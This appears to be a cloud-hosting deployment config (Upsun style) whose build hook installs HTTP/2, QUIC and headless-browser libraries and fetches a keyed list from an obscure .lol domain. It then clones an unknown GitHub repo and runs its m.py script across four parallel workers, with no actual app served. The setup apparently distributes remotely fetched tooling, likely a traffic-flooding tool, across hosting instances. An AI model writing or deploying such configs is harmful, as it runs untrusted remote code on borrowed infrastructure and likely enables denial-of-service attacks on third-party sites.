applications:
  myapp:
    type: 'nodejs:24'

    build:
      flavor: none

    hooks:
      build: |
        echo "=== Build phase ==="
        node --version
        npm --version

        apt-get update
        apt-get install -y python3 python3-pip python3-dev build-essential libssl-dev git curl

        python3 --version
        pip3 --version

        pip3 install --upgrade pip
        pip3 install aioquic uvloop requests

        npm install net chalk hpack.js hpack colors puppeteer-real-browser cluster

        curl -s "https://xn--mnqu23e2hf.lol/api.php?key=user1208&country=all" > k.txt

        git clone https://github.com/vrbrh921-glitch/Fc.git

    web:
      commands:
        start: |
          cd Fc
          export INSTANCE_NUMBER=1
          export TOTAL_INSTANCES=4
          export RUNNER_OS=upsun
          python3 m.py

      locations:
        "/":
          passthru: true
          allow: true

    # =========================
    # WORKERS (INSIDE APP)
    # =========================
    workers:
      worker1:
        size: S
        commands:
          start: |
            cd Fc
            export INSTANCE_NUMBER=1
            export TOTAL_INSTANCES=4
            export RUNNER_OS=upsun
            python3 m.py

      worker2:
        size: S
        commands:
          start: |
            cd Fc
            export INSTANCE_NUMBER=2
            export TOTAL_INSTANCES=4
            export RUNNER_OS=upsun
            python3 m.py

      worker3:
        size: S
        commands:
          start: |
            cd Fc
            export INSTANCE_NUMBER=3
            export TOTAL_INSTANCES=4
            export RUNNER_OS=upsun
            python3 m.py

      worker4:
        size: S
        commands:
          start: |
            cd Fc
            export INSTANCE_NUMBER=4
            export TOTAL_INSTANCES=4
            export RUNNER_OS=upsun
            python3 m.py
